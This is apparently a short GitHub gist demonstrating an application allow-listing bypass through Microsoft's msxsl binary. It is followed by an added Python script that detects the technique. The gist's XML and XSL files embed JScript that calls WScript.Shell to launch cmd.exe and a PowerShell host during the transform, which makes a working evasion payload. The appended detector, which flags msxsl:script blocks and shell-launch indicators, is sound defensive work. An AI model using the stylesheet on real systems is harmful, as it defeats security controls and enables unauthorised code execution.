@netbiosX
Created July 5, 2017 20:29
Bypass Application Whitelisting via msxsl binary
<?xml version="1.0"?>
<?xml-stylesheet type="text/xsl" href="script.xsl" ?>
<customers>
  <customer>
    <name>Microsoft</name>
  </customer>
</customers>

<?xml version='1.0'?>
<xsl:stylesheet version="1.0"
    xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
    xmlns:msxsl="urn:schemas-microsoft-com:xslt"
    xmlns:user="http://mycompany.com/mynamespace">
  <msxsl:script language="JScript" implements-prefix="user">
    function xml(nodelist) {
      var r = new ActiveXObject("WScript.Shell").Run("cmd.exe");
      var r = new ActiveXObject("WScript.Shell").Run("cmd.exe /k C:\\PSShell.exe");
      return nodelist.nextNode().xml;
    }
  </msxsl:script>
  <xsl:template match="/">
    <xsl:value-of select="user:xml(.)"/>
  </xsl:template>
</xsl:stylesheet>
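
Added example, not part of the original gist: a defender-side check that parses an XSLT file and reports every `msxsl:script` element, which is the construct the stylesheet above relies on to run JScript during a transform. The function name, the indicator list and both sample stylesheets are assumptions constructed for this example.

```python
import re
import xml.etree.ElementTree as ET

MSXSL_NS = "urn:schemas-microsoft-com:xslt"  # namespace bound to msxsl: in the stylesheet
# Indicator names and patterns are this example's own choice, taken from the script body above.
INDICATORS = {
    "ActiveXObject": r"\bActiveXObject\b",
    "WScript.Shell": r"WScript\.Shell",
    "Run call": r"\.Run\s*\(",
}

def audit_stylesheet(xsl_text):
    """Return one finding per msxsl:script element found in the stylesheet text."""
    if "<!DOCTYPE" in xsl_text:
        # Files under review are untrusted: refuse DTDs instead of expanding entities.
        raise ValueError("DOCTYPE not accepted")
    root = ET.fromstring(xsl_text.strip())
    findings = []
    for script in root.iter("{%s}script" % MSXSL_NS):
        body = "".join(script.itertext())
        findings.append({
            "language": script.get("language"),
            "prefix": script.get("implements-prefix"),
            "indicators": [n for n, p in INDICATORS.items() if re.search(p, body)],
        })
    return findings

# Constructed samples: one with the same shape as the stylesheet above, one plain.
SCRIPTED = """<?xml version='1.0'?>
<xsl:stylesheet version="1.0"
    xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
    xmlns:msxsl="urn:schemas-microsoft-com:xslt"
    xmlns:user="http://mycompany.com/mynamespace">
  <msxsl:script language="JScript" implements-prefix="user">
    function xml(nodelist) {
      var r = new ActiveXObject("WScript.Shell").Run("cmd.exe");
      return nodelist.nextNode().xml;
    }
  </msxsl:script>
  <xsl:template match="/"><xsl:value-of select="user:xml(.)"/></xsl:template>
</xsl:stylesheet>"""

PLAIN = """<xsl:stylesheet version="1.0"
    xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
  <xsl:template match="/"><xsl:value-of select="customers/customer/name"/></xsl:template>
</xsl:stylesheet>"""

if __name__ == "__main__":
    for label, text in (("scripted", SCRIPTED), ("plain", PLAIN)):
        print(label, audit_stylesheet(text))
```

An empty result means the stylesheet carries no embedded script block; any finding is worth review regardless of which indicators matched, since the script body can be obfuscated.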